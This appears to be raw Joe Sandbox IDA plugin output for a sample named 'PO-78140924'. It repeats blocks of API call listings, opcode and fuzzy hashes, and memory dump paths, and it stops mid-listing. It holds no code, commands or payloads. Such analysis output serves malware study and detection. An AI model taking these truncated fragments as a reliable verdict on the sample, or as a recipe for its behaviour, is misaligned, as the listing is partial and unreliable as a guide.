                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 4218babc38f30f65d1b7d6cdc4ec4ebb9dda09c08fb1ae1d95410c1622e08b5a
                                                • Instruction ID: f442050764a87260484c96215cd97a9b81f4e3d13f57b3c8c7bf55589f7e96c8
                                                • Opcode Fuzzy Hash: 4218babc38f30f65d1b7d6cdc4ec4ebb9dda09c08fb1ae1d95410c1622e08b5a
                                                • Instruction Fuzzy Hash: 25F03971505B16CFCB349F64E8948A6BBE5BF043293208A3EE1D682720C731A895DF40
                                                APIs
                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00030930
                                                  • Part of subcall function 00017D2C: _memmove.LIBCMT ref: 00017D66
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: LongNamePath_memmove
                                                • String ID:
                                                • API String ID: 2514874351-0
                                                • Opcode ID: eed781882d3a17359d8e7909e37df3d8fa6c41d510028a366b0a46dfd1ff5272
                                                • Instruction ID: f6303f75bad6a9be2e9eaeb59264cb8c16f3b2ab4c383ba8b4830e79d33ad9b0
                                                • Opcode Fuzzy Hash: eed781882d3a17359d8e7909e37df3d8fa6c41d510028a366b0a46dfd1ff5272
                                                • Instruction Fuzzy Hash: 75E0867690512857C720D6989C05FFA77EDDF88690F0401B6FC0CD7205D9645C918691
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __fread_nolock
                                                • String ID:
                                                • API String ID: 2638373210-0
                                                • Opcode ID: 87e92921201f7f350e3b6a5d32947fae34ea2a0dab1f5900b9b8b54ddfacd81a
                                                • Instruction ID: 9e6437a371fb3eac8a3321a48b6c3b99f59898cc5a28527dd37dcb73bf42b37b
                                                • Opcode Fuzzy Hash: 87e92921201f7f350e3b6a5d32947fae34ea2a0dab1f5900b9b8b54ddfacd81a
                                                • Instruction Fuzzy Hash: 0AE092B1608B009BDB358A24D8007E373E1AB06305F00482CF29AC3242EB67B841CB59
                                                APIs
                                                  • Part of subcall function 0007339D: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,?,?,000734AA,?,?,?,0004DF90,000C55C0,00000002), ref: 0007341B
                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,0004DF90,000C55C0,00000002), ref: 000734B8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: File$PointerWrite
                                                • String ID:
                                                • API String ID: 539440098-0
                                                • Opcode ID: 8d0d28d3eb315c3f841d878f8e67c00f040b3580b28e0b9743e5694bd6beac83
                                                • Instruction ID: b60f14c3d3421a8b6793271c51c01e6f4c7b97ae3f96f4f818ca4875d9dd1b81
                                                • Opcode Fuzzy Hash: 8d0d28d3eb315c3f841d878f8e67c00f040b3580b28e0b9743e5694bd6beac83
                                                • Instruction Fuzzy Hash: 42E0B636410218FBEB20AF94D905FDAB7BDEB04320F10465BF94496111DBB6AF24ABE5
                                                APIs
                                                • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0004E09B), ref: 00015DBF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: fe3b7c2fe0ce3e8469c661bad4fc527c761e38a24fc1864a59c92a2fb984e0c5
                                                • Instruction ID: daf9c05f43ca79fd8dbf0396063df928d76a050f9c29e4f9c5a7ced60fdefe8b
                                                • Opcode Fuzzy Hash: fe3b7c2fe0ce3e8469c661bad4fc527c761e38a24fc1864a59c92a2fb984e0c5
                                                • Instruction Fuzzy Hash: 47D0C77464020CBFE710DB80DC46FA9777CE705710F100195FD0496290D6B27D508795
                                                APIs
                                                • KillTimer.USER32(?,00000001), ref: 000136FC
                                                  • Part of subcall function 000144CB: _memset.LIBCMT ref: 000144F7
                                                  • Part of subcall function 000144CB: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00014527
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: IconKillNotifyShell_Timer_memset
                                                • String ID:
                                                • API String ID: 4009928425-0
                                                • Opcode ID: f84359e180c324004ced6a9355c4228b6609dc871664c5f9700391539ca20525
                                                • Instruction ID: 45643b2c0bf3ba8075b01e0b328b223dc28cf72cc6fa7b278b00497a0af2c66d
                                                • Opcode Fuzzy Hash: f84359e180c324004ced6a9355c4228b6609dc871664c5f9700391539ca20525
                                                • Instruction Fuzzy Hash: 11C0123A34650472C22072B468466EDA300EB88312B004523FE0AE12828D5601A164B2
                                                APIs
                                                • CloseHandle.KERNELBASE(?,?,?,00015921), ref: 00015DEF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: 32ee0f079318a2287835dfa247c2c3e2193826411e5b88b1a97b78aa512ca627
                                                • Instruction ID: 74da034ce2dc7ff675681380bf738828743b8d5c50880ec1f779424efa25bd87
                                                • Opcode Fuzzy Hash: 32ee0f079318a2287835dfa247c2c3e2193826411e5b88b1a97b78aa512ca627
                                                • Instruction Fuzzy Hash: 8CE0B679400B01CFD3314F1AE808466FBF5FFE13623208A2FD4E6866A0D3B1588ACB50
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?), ref: 0009CBA1
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0009CBFF
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0009CC40
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0009CC6A
                                                • SendMessageW.USER32 ref: 0009CC93
                                                • _wcsncpy.LIBCMT ref: 0009CCFF
                                                • GetKeyState.USER32(00000011), ref: 0009CD20
                                                • GetKeyState.USER32(00000009), ref: 0009CD2D
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0009CD43
                                                • GetKeyState.USER32(00000010), ref: 0009CD4D
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0009CD76
                                                • SendMessageW.USER32 ref: 0009CD9D
                                                • SendMessageW.USER32(?,00001030,?,0009B37C), ref: 0009CEA1
                                                • SetCapture.USER32(?), ref: 0009CED3
                                                • ClientToScreen.USER32(?,?), ref: 0009CF38
                                                • InvalidateRect.USER32(?,00000000,00000001,?), ref: 0009CF5F
                                                • ReleaseCapture.USER32 ref: 0009CF6A
                                                • GetCursorPos.USER32(?), ref: 0009CFA4
                                                • ScreenToClient.USER32(?,?), ref: 0009CFB1
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0009D00D
                                                • SendMessageW.USER32 ref: 0009D03B
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0009D078
                                                • SendMessageW.USER32 ref: 0009D0A7
                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0009D0C8
                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0009D0D7
                                                • GetCursorPos.USER32(?), ref: 0009D0F7
                                                • ScreenToClient.USER32(?,?), ref: 0009D104
                                                • GetParent.USER32(?), ref: 0009D124
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0009D18D
                                                • SendMessageW.USER32 ref: 0009D1BE
                                                • ClientToScreen.USER32(?,?), ref: 0009D21C
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0009D24C
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0009D276
                                                • SendMessageW.USER32 ref: 0009D299
                                                • ClientToScreen.USER32(?,?), ref: 0009D2EB
                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0009D31F
                                                  • Part of subcall function 000125DB: GetWindowLongW.USER32(?,000000EB), ref: 000125EC
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0009D3BB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                • String ID: @GUI_DRAGID$F$pb
                                                • API String ID: 302779176-2094696308
                                                • Opcode ID: 5c8150f33760f3811d5fc656c4f14f853a686e52c3b6925836f450ce1c851695
                                                • Instruction ID: 5123465a2e0e7bcef871c1af6219229532b10f12def9219075527a24fef6f64a
                                                • Opcode Fuzzy Hash: 5c8150f33760f3811d5fc656c4f14f853a686e52c3b6925836f450ce1c851695
                                                • Instruction Fuzzy Hash: C9429F30605341AFEB20CF24C845EAABBE5FF49314F14092AFA95D72A1C736D954EB92
                                                APIs
                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00098502
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: %d/%02d/%02d$0
                                                • API String ID: 3850602802-4206205729
                                                • Opcode ID: 13b88007c939478876e9e115704f05c393f2cf28cbeb2b1404d662757f8d0138
                                                • Instruction ID: d48cfb29079a5c5e13582ea7370154b5c1a0a654b47a4b98597a48186dcc1ae5
                                                • Opcode Fuzzy Hash: 13b88007c939478876e9e115704f05c393f2cf28cbeb2b1404d662757f8d0138
                                                • Instruction Fuzzy Hash: 2012BD71500605AFEF659F28CC49FAE7BF8FF4A310F108169F919EA2A1DB748945DB10
                                                APIs
                                                • GetForegroundWindow.USER32(00000000,?), ref: 00014A3D
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0004D9BE
                                                • IsIconic.USER32(?), ref: 0004D9C7
                                                • ShowWindow.USER32(?,00000009), ref: 0004D9D4
                                                • SetForegroundWindow.USER32(?), ref: 0004D9DE
                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0004D9F4
                                                • GetCurrentThreadId.KERNEL32 ref: 0004D9FB
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0004DA07
                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0004DA18
                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0004DA20
                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 0004DA28
                                                • SetForegroundWindow.USER32(?), ref: 0004DA2B
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0004DA40
                                                • keybd_event.USER32(00000012,00000000), ref: 0004DA4B
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0004DA55
                                                • keybd_event.USER32(00000012,00000000), ref: 0004DA5A
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0004DA63
                                                • keybd_event.USER32(00000012,00000000), ref: 0004DA68
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0004DA72
                                                • keybd_event.USER32(00000012,00000000), ref: 0004DA77
                                                • SetForegroundWindow.USER32(?), ref: 0004DA7A
                                                • AttachThreadInput.USER32(?,?,00000000), ref: 0004DAA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                 • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 4125248594-2988720461
                                                • Opcode ID: 9fd6229594d5803ff5f2960c8181e91465a54768c3dad9ff55cf8d9e0ad8af61
                                                • Instruction ID: 3352e128e0fdf70fe455b8e74a030394a7204a7334a315b113bf145f55473bac
                                                • Opcode Fuzzy Hash: 9fd6229594d5803ff5f2960c8181e91465a54768c3dad9ff55cf8d9e0ad8af61
                                                • Instruction Fuzzy Hash: D63150B1A40319BAFB206FA19C49F7E7E6CEB44B50F114037FA04EA1D0C6B45D11AAA5
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                • DragQueryPoint.SHELL32(?,?), ref: 0009C691
                                                  • Part of subcall function 0009AB69: ClientToScreen.USER32(?,?), ref: 0009AB92
                                                  • Part of subcall function 0009AB69: GetWindowRect.USER32(?,?), ref: 0009AC08
                                                  • Part of subcall function 0009AB69: PtInRect.USER32(?,?,?), ref: 0009AC18
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0009C6FA
                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0009C705
                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0009C728
                                                • _wcscat.LIBCMT ref: 0009C758
                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0009C76F
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0009C788
                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0009C79F
                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0009C7C1
                                                • DragFinish.SHELL32(?), ref: 0009C7C8
                                                • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0009C8BB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb
                                                • API String ID: 2166380349-3885641380
                                                • Opcode ID: 4c10c0887a389f4386670cf26eca94e4f4b227a39183ef7867065252c43d8b1a
                                                • Instruction ID: c96a945640046467505c7a6941644f056efd0260a3ef1dff25db855520dfd0b0
                                                • Opcode Fuzzy Hash: 4c10c0887a389f4386670cf26eca94e4f4b227a39183ef7867065252c43d8b1a
                                                • Instruction Fuzzy Hash: B8616A71508301AFD701EF60DC85DAFBBE9FF88750F40092EF695961A2DB709A49CB92
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0009C266
                                                • GetFocus.USER32 ref: 0009C276
                                                • GetDlgCtrlID.USER32(00000000), ref: 0009C281
                                                • _memset.LIBCMT ref: 0009C3AC
                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0009C3D7
                                                • GetMenuItemCount.USER32(?), ref: 0009C3F7
                                                • GetMenuItemID.USER32(?,00000000), ref: 0009C40A
                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0009C43E
                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0009C486
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0009C4BE
                                                • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?), ref: 0009C4F3
                                                Strings
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                • String ID: 0
                                                • API String ID: 3616455698-4108050209
                                                • Opcode ID: d4ec65dac28bf96d62251f90721b68504ba72c8b769acfd4ee50ba77d6117de1
                                                • Instruction ID: fd26fb35f2a6e6954d1cd4ed291ccc112a115e730b5479fe4b8a33ae6336652e
                                                • Opcode Fuzzy Hash: d4ec65dac28bf96d62251f90721b68504ba72c8b769acfd4ee50ba77d6117de1
                                                • Instruction Fuzzy Hash: 04815D71A093019FEB10DF14D894EBBBBE8FB88354F10452EF99597291C770D905EBA2
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                • GetSystemMetrics.USER32(0000000F), ref: 0009D4E6
                                                • GetSystemMetrics.USER32(0000000F), ref: 0009D506
                                                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0009D741
                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0009D75F
                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0009D780
                                                • ShowWindow.USER32(00000003,00000000), ref: 0009D79F
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0009D7C4
                                                • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 0009D7E7
                                                Strings
                                                Similarity
                                                • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                                                • String ID:
                                                • API String ID: 830902736-3916222277
                                                • Opcode ID: 89c988a2e7b02dfb8538136c8bc94972068998b8e8942b573c06e115e3d01a2f
                                                • Instruction ID: 533924c1e5dfa5972e1256dad3819fbec64e07d95cc52cde864025c821e0b2c4
                                                • Opcode Fuzzy Hash: 89c988a2e7b02dfb8538136c8bc94972068998b8e8942b573c06e115e3d01a2f
                                                • Instruction Fuzzy Hash: 68B17975640625EFDF14CFA8C9C57BDBBF1BF04711F08806AEC48AA295E734A950EB60
                                                APIs
                                                  • Part of subcall function 00012612: GetWindowLongW.USER32(?,000000EB), ref: 00012623
                                                  • Part of subcall function 00012344: GetCursorPos.USER32(?), ref: 00012357
                                                  • Part of subcall function 00012344: ScreenToClient.USER32(000D57B0,?), ref: 00012374
                                                  • Part of subcall function 00012344: GetAsyncKeyState.USER32(00000001), ref: 00012399
                                                  • Part of subcall function 00012344: GetAsyncKeyState.USER32(00000002), ref: 000123A7
                                                • ReleaseCapture.USER32 ref: 0009C06A
                                                • SetWindowTextW.USER32(?,00000000), ref: 0009C114
                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0009C127
                                                • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?), ref: 0009C209
                                                Strings
                                                Similarity
                                                • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID$pb$pb
                                                • API String ID: 973565025-24452153
                                                • Opcode ID: 976d7e5a3d73a6c8cfb2241ce07104e0c404711d5bfd2c1e1896b4fac1659ef8
                                                • Instruction ID: 3abc58750b40db6cb626e58bb9c41b1d083709213b12ec0a2764f4901bc4a2e0
                                                • Opcode Fuzzy Hash: 976d7e5a3d73a6c8cfb2241ce07104e0c404711d5bfd2c1e1896b4fac1659ef8
                                                • Instruction Fuzzy Hash: 9451CD70208301AFEB04EF14CC95FAA7BE1FB88311F00452EF9559B2E2CB35A944DB62
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,0009FB24,00000001,00000000,?,?,000483C9,0009FB24,0000000C,00000080), ref: 0004998B
                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00049992
                                                  • Part of subcall function 00038CA8: __getptd_noexit.LIBCMT ref: 00038CA8
                                                • __lseeki64_nolock.LIBCMT ref: 00049A56
                                                • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0009FB24,00000001,00000000,?,?,000483C9), ref: 00049A71
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0009FB24,00000001,00000000,?,?,000483C9,0009FB24), ref: 00049AA1
                                                • __lseeki64_nolock.LIBCMT ref: 00049ABE
                                                Strings
                                                Similarity
                                                • API ID: Heap__lseeki64_nolock$AllocateErrorFileLastProcess__getptd_noexit
                                                • String ID: shj
                                                • API String ID: 3769897626-2847237874
                                                • Opcode ID: 5527d0536f1e9fbdc404a6bd79ef2953e415d646b1dfd949e43a68d1c21e5134
                                                • Instruction ID: dd9fce12c24de81e7c00740db2c695e279dd60c55e3139c40d990f76dcac4582
                                                • Opcode Fuzzy Hash: 5527d0536f1e9fbdc404a6bd79ef2953e415d646b1dfd949e43a68d1c21e5134
                                                • Instruction Fuzzy Hash: 5F1197B2A406019BDB112BB8DC0A7FE36A4FF45320F104378F528D21E1EB3C88104766
                                                APIs
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 7f8db62949eda1edc81664e282fca92907cb3a89e865ac5818370a79340609d9
                                                • Instruction ID: 28f8d494357fe4b55ded3e06a2f594862c6d9dba59b2c8f22a6b35bc8e2541e5
                                                • Opcode Fuzzy Hash: 7f8db62949eda1edc81664e282fca92907cb3a89e865ac5818370a79340609d9
                                                • Instruction Fuzzy Hash: 1212BC70A00619EFDF14CFA4D985AEEB3FAFF48300F108569E406A7252EB35AE51CB54
                                                APIs
                                                  • Part of subcall function 00030F36: std::exception::exception.LIBCMT ref: 00030F6C
                                                  • Part of subcall function 00030F36: __CxxThrowException@8.LIBCMT ref: 00030F81
                                                • _memmove.LIBCMT ref: 000605AE
                                                • _memmove.LIBCMT ref: 000606C3
                                                • _memmove.LIBCMT ref: 0006076A
                                                Similarity
